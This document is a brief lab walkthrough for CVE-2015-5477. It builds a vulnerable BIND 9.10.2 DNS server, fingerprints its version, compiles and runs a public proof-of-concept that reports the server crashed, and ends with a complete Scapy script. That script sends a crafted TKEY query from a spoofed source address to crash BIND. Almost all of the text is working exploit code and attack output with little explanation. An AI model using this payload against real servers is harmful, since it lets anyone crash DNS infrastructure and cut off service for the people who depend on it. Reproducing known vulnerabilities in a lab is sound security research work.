# CVE-2015-5477: BIND9 TKEY assert DoS

Server

# wget -O bind-9-10-2-p2.tar.gz https://www.isc.org/downloads/file/bind-9-10-2-p2/?version=tar-gz
# tar xvzf bind-9-10-2-p2.tar.gz
# cd bind-9.10.2-P2
# ./configure --without-openssl
# make
# touch /etc/named.conf
# bin/named/named -g

Client

# apt-get install fpdns
# fpdns server_ip
fingerprint (server_ip, server_ip): ISC BIND 9.2.3rc1 -- 9.6.1-P1 [recursion enabled]
# dig @server_ip -c chaos -t txt version.bind +short
"9.10.2-P2"

# wget https://raw.githubusercontent.com/robertdavidgraham/cve-2015-5477/master/tkill.c
# gcc -o tkill tkill.c
# ./tkill server_ip
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] server_ip: Resolving to IP address
[+] server_ip: Resolved to multiple IPs (NOTE)
[+] server_ip: Probing...
[+] Querying version...
[+] server_ip: "9.10.2-P2" 
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

# cat cve-2015-5477.py
from scapy.all import *
from sys import argv

target = argv[1]

spoofed = '192.0.2.1'
dns_query = '\x00\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x03foo\x03bar\x00\x00\xf9\x00\xff\x03foo\x03bar\x00\x00\x10\x00\xff\x00\x00\x00\x00\x00\x07\x06foobar'

send(IP(src = spoofed, dst = target) / UDP(dport = 53) / Raw(load = dns_query))
# python cve-2015-5477.py server_ip

Reference

https://github.com/robertdavidgraham/cve-2015-5477